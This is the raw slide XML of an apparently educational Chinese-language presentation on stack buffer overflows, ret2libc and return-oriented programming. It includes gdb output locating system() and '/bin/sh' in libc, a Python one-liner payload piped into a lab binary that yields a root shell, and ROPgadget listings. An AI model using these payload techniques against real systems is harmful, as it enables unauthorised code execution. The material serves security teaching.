              <a:ext cx="366172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942192"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Ret after call func</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1451" name="system address"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2285829" y="5206495"/>
              <a:ext cx="330565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system address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1452" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="55981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1453" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="961279" y="5954989"/>
              <a:ext cx="1078458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4" name="/bin/sh"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3289414" y="6914462"/>
              <a:ext cx="145118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9300"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>/bin/sh</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1455" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3378041" y="2683099"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1456" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3378041" y="3521299"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1457" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3378041" y="4359499"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1458" name="Null"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3569137" y="7749578"/>
              <a:ext cx="89173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40FF"/>
                  </a:solidFill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459" name="Null"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3569137" y="8587778"/>
              <a:ext cx="89173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F900"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Null</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1461" name="Screen Shot 2019-05-14 at 2.52.05 PM.png" descr="Screen Shot 2019-05-14 at 2.52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69" y="6465519"/>
            <a:ext cx="13438757" cy="472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462" name="System function只使用一個參數，故argv2,3放null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1871185" y="11249739"/>
            <a:ext cx="1117732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System function只使用一個參數，故argv2,3放null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Exploit ret2libc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="6760777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Exploit ret2libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1465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466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1467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0x61616161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2600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0xf7e4ada0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1495" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15071391" y="3708399"/>
            <a:ext cx="6933138" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6933137" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1468" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="212114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69" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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7" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3353038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1478" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5863127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1479" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5863139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1480" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657987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1481" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657987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1482" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="212114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4" name="0xe0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5837578" y="5598119"/>
              <a:ext cx="109556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0xe0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1485" name="0x0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3518014" y="60765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942192"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>0x0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1486" name="0xf7e4ada0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2691683" y="5234978"/>
              <a:ext cx="249394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0xf7e4ada0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1487" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="55981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1488" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="961279" y="5954989"/>
              <a:ext cx="1078458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9" name="0xf7f6ba0b"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831656" y="6911378"/>
              <a:ext cx="236670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9300"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>0xf7f6ba0b</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1490" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3378041" y="2683099"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1491" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3378041" y="3521299"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1492" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3378041" y="4359499"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1493" name="0x0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3569137" y="7749578"/>
              <a:ext cx="84128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40FF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>0x0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1494" name="0x0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3569137" y="8587778"/>
              <a:ext cx="84128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F900"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>0x0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1496" name="[gdb]&gt; p system…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813123" y="3883290"/>
            <a:ext cx="12181630" cy="900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p system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$1 = {&lt;text variable, no debug info&gt;} 0xf7e4ada0 &lt;__libc_system&gt;                                  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FFC126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[gdb]&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vmmap</a:t>
            </a:r>
            <a:endParaRPr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300">
                <a:solidFill>
                  <a:srgbClr val="4AB2EB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Start      End        Perm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:t>Name</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:solidFill>
                <a:srgbClr val="A9A9A9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0x08048000 0x08049000 r-xp      /tmp/bof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0x08049000 0x0804a000 r--p      /tmp/bof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0x0804a000 0x0804b000 rw-p      /tmp/bof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0x0804b000 0x0806c000 rw-p      [heap]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0xf7e0f000 0xf7e10000 rw-p      mapped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9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7e10000 0xf7fc0000</a:t>
            </a:r>
            <a:r>
              <a:t> r-xp      /lib/i386-linux-gnu/libc-2.23.so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0xf7fc0000 0xf7fc2000 r--p      /lib/i386-linux-gnu/libc-2.23.so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0xf7fc2000 0xf7fc3000 rw-p      /lib/i386-linux-gnu/libc-2.23.so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0xf7fc3000 0xf7fc6000 rw-p      mapped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0xf7fd4000 0xf7fd5000 rw-p      mapped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0xf7fd5000 0xf7fd8000 r--p      [vvar]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0xf7fd8000 0xf7fd9000 r-xp      [vdso]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0xf7fd9000 0xf7ffc000 r-xp      /lib/i386-linux-gnu/ld-2.23.so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0xf7ffc000 0xf7ffd000 r--p      /lib/i386-linux-gnu/ld-2.23.so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0xf7ffd000 0xf7ffe000 rw-p      /lib/i386-linux-gnu/ld-2.23.so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0xfffdd000 0xffffe000 rw-p      [stack]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p system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$2 = {&lt;text variable, no debug info&gt;} </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7e4ada0</a:t>
            </a:r>
            <a:r>
              <a:t> &lt;__libc_system&gt;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C126"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[gdb]&gt; </a:t>
            </a:r>
            <a:r>
              <a:t>find "/bin/sh" </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7e10000 0xf7fc0000</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF930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Searching for '/bin/sh' in range: 0xf7e10000 - 0xf7fc0000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Found 1 results, display max 1 items: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libc : </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7f6ba0b</a:t>
            </a:r>
            <a:r>
              <a:t> ("/bin/sh")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Exploit ret2libc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="6760777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Exploit ret2libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1499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500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1501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0x61616161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2600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0xf7e4ada0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1529" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15071391" y="3708399"/>
            <a:ext cx="6933138" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6933137" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1502" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="212114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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149" y="68097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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149" y="59588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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149" y="51333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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149" y="4295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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149" y="3444278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8" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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9" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149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1" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3353038" y="0"/>
              <a:ext cx="1171239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1512" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5863127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1513" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5863139" y="8976319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1514" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657987" y="104054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1515" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657987" y="1882178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1516" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149" y="84861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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121149" y="7647978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8" name="0xe0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5837578" y="5598119"/>
              <a:ext cx="109556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0xe0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1519" name="0x0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3518014" y="6076578"/>
              <a:ext cx="8412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942192"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>0x0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1520" name="0xf7e4ada0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2691683" y="5234978"/>
              <a:ext cx="249394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0xf7e4ada0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1521" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="5598119"/>
              <a:ext cx="96831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esp </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1522" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="961279" y="5954989"/>
              <a:ext cx="1078458" cy="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3" name="0xf7f6ba0b"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831656" y="6911378"/>
              <a:ext cx="236670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9300"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>0xf7f6ba0b</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1524" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3378041" y="2683099"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1525" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3378041" y="3521299"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1526" name="aaaa"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3378041" y="4359499"/>
              <a:ext cx="112123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4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>aaaa</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1527" name="Null"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3569137" y="7749578"/>
              <a:ext cx="89173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40FF"/>
                  </a:solidFill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528" name="Null"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3569137" y="8587778"/>
              <a:ext cx="89173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F900"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Null</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1530" name="root@Ubuntu : tmp ➤ (python -c &quot;print 'a'*13+'\xa0\xad\xe4\xf7'+'\x00\x00\x00\x00'+'\x0b\xba\xf6\xf7'&quot; ; cat)|./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921830" y="7147639"/>
            <a:ext cx="14192607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(python -c "print 'a'*13+'\xa0\xad\xe4\xf7'+'\x00\x00\x00\x00'+'\x0b\xba\xf6\xf7'" ; cat)|./easy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id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uid=0(root) gid=0(root) groups=0(root)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Demo"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10340821" y="6075679"/>
            <a:ext cx="3689659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ROP"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10750408" y="6075679"/>
            <a:ext cx="2870484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oF"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10909779" y="6075679"/>
            <a:ext cx="2551743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BoF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ROP"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="2095908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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1537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538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539" name="Return Oriented Programing…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="8291960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Return Oriented Programing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利用程式中含有ret的片段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組合各式各樣function call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1540" name="簡言之，控制EIP及Stack後，利用一連串結尾為ret的程式片段…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5833909" y="6818630"/>
            <a:ext cx="12703483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簡言之，控制EIP及Stack後，利用一連串結尾為ret的程式片段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>控制程式流程</a:t>
            </a:r>
            <a:r>
              <a:t>，組合出system(“/bin/sh”)的function call。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>可以bypass大部分系統/程式保護。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ROPgadget"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5175311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ROPgadget</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1543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54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545" name="list可用的ROP片段…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10598705" y="1187061"/>
            <a:ext cx="13308658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list可用的ROP片段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:srgbClr val="216BA9"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="216BA9"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://github.com/JonathanSalwan/ROPgadget</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1546" name="root@Ubuntu : tmp ➤ ROPgadget --binary ./easy_nx |more…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2078708" y="4792979"/>
            <a:ext cx="20213884" cy="679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ROPgadget --binary ./easy_nx |more                                                                                                                                            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Gadgets information                                                                                                                                                                               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============================================================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0x080485c5 : adc al, 0x41 ; ret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0x080483fe : adc al, 0x50 ; call edx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0x0804836d : adc al, 0x68 ; sbb al, 0xa0 ; add al, 8 ; call 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0x080483a6 : adc byte ptr [eax + 0x68], dl ; sbb al, 0xa0 ; add al, 8 ; call edx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0x0804841f : adc byte ptr [eax], bh ; leave ; ret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0x08048377 : adc cl, cl ; ret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0x08048444 : add al, 0x59 ; pop ebp ; lea esp, dword ptr [ecx - 4] ; ret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0x080483d8 : add al, 8 ; add ecx, ecx ; ret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0x08048371 : add al, 8 ; call eax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0x080483ab : add al, 8 ; call edx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0x080484af : add 